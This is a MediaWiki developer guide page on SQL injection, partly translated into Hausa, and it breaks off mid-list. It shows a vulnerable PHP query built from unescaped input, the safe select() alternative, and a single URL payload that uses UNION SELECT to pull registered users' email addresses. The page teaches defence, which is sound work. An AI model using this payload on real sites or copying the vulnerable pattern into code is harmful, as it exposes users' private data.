Jump to content

SQL injection/ha

From mediawiki.org
This page is a translated version of the page SQL injection and the translation is 5% complete.

Overview

SQL injection is a type of attack that uses vulnerabilities in an application's input validation or data typing for SQL queries.

When successful, the attack allows the attacker to inject data into an existing SQL query. The attacker may then be able to fetch private data, cause a denial of service or cause other unintended responses. In the worst case, the injected code would allow the attacker to gain full control of the system by exploiting multiple vulnerabilities in the database server, system utilities and operating system.

For an overview of SQL injection attacks, review Wikipedia's SQL Injection page.

Example

The following code snippet would allow an attacker to execute their own SQL commands (and is a syntax error in Oracle).

$limit = $wgRequest->getVal( 'limit' );
$res = $db->query( "SELECT * from kitties LIMIT $limit" );

Kafin MW 1.35, hanyar da aka fi so don gudanar da tambayar da ke sama za ta kasance:

$limit = $wgRequest->getVal( 'limit' );
$limit = intval( $limit ); // OPTIONAL validation
$res = $db->select( 'kitties',
                    '*',
                    false,
                    __METHOD__,
                    array( 'LIMIT' => $limit ) // REQUIRED automatic escaping
);

See Manual:Database access for more recent approaches to building SQL queries using the SelectQueryBuilder class.

To exploit the vulnerability and fetch the email addresses of registered wiki users, the attacker would use a GET string of:

?limit=%201%20union%20select%20user_email%20from%20user;


SQL Injection and MediaWiki

MediaWiki has a custom SQL generation interface which has proven to be effective for eliminating SQL injection vulnerabilities. The SQL generation interface also provides DBMS abstraction and features such as table prefixes.

To keep MediaWiki safe from SQL injection: